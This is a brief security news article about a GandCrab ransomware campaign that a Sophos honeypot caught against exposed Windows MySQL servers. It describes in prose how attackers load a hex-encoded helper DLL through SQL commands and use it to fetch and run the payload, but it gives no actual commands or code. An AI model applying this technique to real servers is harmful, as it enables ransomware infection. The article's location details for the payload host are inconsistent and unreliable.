Security researchers have discovered new GandCrab Ransomware campaign targeting internet-facing Windows MySQL servers.
The new campaign was spotted by security researchers at Sophos Labs.
” A honeypot we run in a lab environment, listening on the default port used for SQL servers (3306/tcp), received an intriguing attack this week from a machine based in the United States.”
Analysing the traffic generated by Honeypot researchers discovered a Windows executable file was downloaded by Honeypot.
The attacker starts infection by uploading a small helper DLL to the server using SQL database commands.
After that invoke the DLL to download the GandCrab ransomware payload from a server hosted on an IP address in Quebec, Canada.
In the first stage, attackers established a connection with the database running MySQL and after that used a set command to upload a helper DLL in the form of hexadecimal characters into memory in a variable.
In the next step, the attacker issued a command to the server to make those bytes to a single file and drops them into the server’s plugin directory.
In the final step, the database server downloads the GandCrab ransomware payload from a remote server to the C: drive in the name of isetup.exe and executes it.
Researcher also observed that attackers used several commands to swap forward slash and backslash characters to evade security detection.
Researcher spotted the attack on May 19th and said that successful execution could encrypt all the files in his system.
“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese. “
For more details regarding the attacks and IoCs visit here
You may be interested in reading: WhatsApp Critical Flaw Allowed Installation of Spyware on to Phones